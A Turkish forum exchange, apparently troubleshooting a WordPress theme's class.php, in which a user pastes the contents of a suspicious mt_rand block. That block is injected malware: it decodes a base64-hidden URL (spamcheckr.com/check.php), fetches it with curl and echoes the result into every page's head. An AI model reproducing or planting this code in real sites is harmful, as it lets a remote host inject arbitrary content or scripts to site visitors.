Asimavi adlı üyeden alıntı: mesajı görüntüle
class.php mt_rand fonsiyonunda bir problem var php.ini de short_open_tag kısmının on olup olmadığını kontrol edin on ise mt_rand fonksiyonun içeriğini bizimle paylaşın lütfen.
short_open_tag açık.
 { if (mt_rand(96,1) == 1) {function secc2_check() {if(function_exists('curl_init'))	{$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secc2_check');}}